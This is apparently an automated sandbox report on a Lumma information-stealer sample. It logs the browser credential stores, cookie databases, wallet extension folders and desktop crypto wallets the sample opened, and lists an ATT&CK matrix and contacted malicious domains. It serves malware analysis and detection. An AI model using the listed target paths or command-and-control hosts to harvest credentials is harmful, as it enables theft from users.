                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1810057731.0000000001A95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1831258871.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1804616185.0000000001A93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1804616185.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1809947662.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1809947662.0000000001A93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1810197735.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1831453164.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6956, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6956, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                641
                Security Software Discovery
                Remote Services1
                Credential API Hooking
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information
                1
                Credential API Hooking
                33
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Software Packing
                NTDS1
                File and Directory Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets123
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe66%ReversingLabsWin32.Trojan.Lumma
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                hypothesizys.click
                104.21.95.235
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  sordid-snaked.cyoufalse
                    high
                    awake-weaves.cyoufalse
                      high
                      immureprech.bizfalse
                        high
                        deafeninggeh.bizfalse
                          high
                          https://hypothesizys.click/apitrue
                            unknown
                            hypothesizys.clicktrue
                              unknown
                              debonairnukk.xyzfalse
                                high
                                diffuculttan.xyzfalse
                                  high
                                  effecterectz.xyzfalse
                                    high
                                    wrathful-jammy.cyoufalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://hypothesizys.click/efile.exe, 00000000.00000003.1756878942.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756984738.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://hypothesizys.click/_file.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732330812.0000000001A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://hypothesizys.click/YDfile.exe, 00000000.00000003.1886520757.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890362595.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://hypothesizys.click/file.exe, 00000000.00000003.1732330812.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809947662.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831453164.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1810197735.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831064343.0000000003FCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctafile.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1734118682.0000000004021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756821918.000000000401A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1734266384.000000000401A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1734118682.0000000004021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756821918.000000000401A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1734266384.000000000401A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://hypothesizys.click:443/apifile.exe, file.exe, 00000000.00000003.1732560961.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1874448498.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1889925037.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809906220.0000000001A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.microfile.exe, 00000000.00000003.1875009517.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886443307.0000000001A8F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831258871.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1874448498.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804616185.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1810157737.0000000001A7E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732330812.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809947662.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831453164.0000000001A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://hypothesizys.click/1Dfile.exe, 00000000.00000003.1874909358.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1848707210.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804616185.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://hypothesizys.click:443/api.default-release/key4.dbPKfile.exe, 00000000.00000003.1874448498.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1889925037.0000000001A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000003.1734266384.0000000003FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.microsoffile.exe, 00000000.00000003.1734118682.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000003.1734266384.0000000003FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
